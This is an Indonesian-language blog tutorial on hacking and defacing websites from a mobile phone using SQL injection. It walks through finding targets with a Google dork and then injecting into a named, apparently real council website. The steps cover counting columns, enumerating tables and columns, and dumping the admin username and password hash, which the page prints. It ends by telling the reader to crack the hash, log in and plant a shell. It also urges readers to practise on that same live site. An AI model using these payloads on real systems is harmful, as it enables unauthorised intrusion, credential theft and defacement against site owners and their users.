Cara Hack/Deface Website with HP

Ok kita balik lagi ketopik kita Tutorial Hack/Deface Website with HandPhone,

1. Hp agan harus suport opera mini bisa hp JAVA atau SYMBIAN atau apalah

2. Gunakan opera mini versi 4 ke atas.

3. Masukin Dork'ny kembah google. Dork: inurl:readnews.php?id=

4. Muncul banyak situs pada satu layar anda, coba anda cari satu persatu, mana yang vuln dan tidak.

5. Saya pilih situs ini http://mostalocalcouncil.com/readnews.php?id=36, selanjutnya beri tanda petik ' pada akhir url.

Contoh : http://mostalocalcouncil.com/readnews.php?id=36'

dan terjadi error, Berarti situs tersebut vuln atau bisa di hack

6. Sekarang kita cari tahu berapa kolom database nya. Caranya dengan menghapus tanda ' dan menggantinya dengan +order+by+1--

Contoh : http://mostalocalcouncil.com/readnews.php?id=36+order+by+1--

gunakan tanda + untuk mengganti spasi , karena opmin tidak menerima url berspasi sperti browser pc

disini terjadi normal kembali dan selanjutnya kita paksa si situs untuk menunjukan berapa jumlah kolom database nya.

Dengan cara : ganti angka 1 dengan angka 10, jika terjadi eror maka urutkan ke angka yang lebih kecil 9,8,7,6 hingga index nörmal , dan sebaliknya jika tidak terdapat error maka urutkan ke angka yang lebih tinggi.

Kita percepat saja, Kolom database si situs ternyata berakhir di angka 6. Jadi yang kita ambil adalah angka sebelumnya yaitu 5.

7. Langsung saja , ganti perintah =36+order+by+5-- dengan =-36+union+select+1,2,3,4,5-- dan nomor togel pun muncul

Contoh: http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,2,3,4,5-- dan nomor togel'ny angka 2.

8. Jadi sekarang kita ganti angka 2 di url dengan perintah version() untuk melihat versi database si situs.

Contoh: http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,version(),3,4,5--

Dan muncul lah angka 5.0.96-community atau apalah yg pnting Versi 5 keatas

9. Ganti tulisan version() di url dengan group_concat(table_name), dan +from+information_schema.tables+where+table_schema=database()--

Contoh : http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()--

dan muncul lah banyak category sepert: adverts,announcements,articles,categories,news,pages,publications,security,users

Selanjutnya kita cari column dari nama table yg ada hubungannya dengan user+password admin,

jadi kita ambil table users tapi sebelumnya kata users tersebut kita convert dulu

ke HEXA [ CLICK HERE ]

Ketik : Users atau nama table apalah lalu Convert! hasilnya : 7573657273

Selanjutnya adalah ubah group_concat(table_name) menjadi group_concat(column_name) dan +from+information_schema.tables+where+table_schema=database()-- menjadi +from+information_schema.columns+where+table_name=0xHEXA--

Ganti HEXA dengan hasil convert tadi: 7573657273 tambahkan 0x didepan HEXA agar server dapat mengetahui bahwa itu telah diconvert ke HEXA

Contoh: http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,group_concat(column_name),3,4,5+from+information_schema.columns+where+table_name=0x7573657273--

muncul kolom: id,username,password,name,email,lastlogin,ip

Pilih kolom username dan password aja ya sob. Untuk melihat isi dari kolom tersebut ganti group_concat(column_name) menjadi group_concat(username,0x3a,password) dan ganti +from+information_schema.columns+where+table_name=0x7573657273-- menjadi +from+users-- karna yang barusan kita masukkin adalah table users

Contoh: http://mostalocalcouncil.com/readnews.php?id=-36+union+select+1,group_concat(username,0x3a,password),3,4,5+from+users--

muncul user dan password website tersebut: admin:68b752263e82b3b1ee1ffe739ee0eec1

Selanjut'ny tinggal kita ubah password yang acak kadut 68b752263e82b3b1ee1ffe739ee0eec1 [ CLICK HERE ]

Cari login situsnya dan tanam shell Congratulation!

> Untuk pembelajaran ane saranin pakai terget seperti yang dicontohin: http://mostalocalcouncil.com/readnews.php?id=36

SUMBER: ZavalegalS & I.F.C atau SUMBER: ZavalegalS.BlogspoT.CoM & Forum.Ifc.Or.Id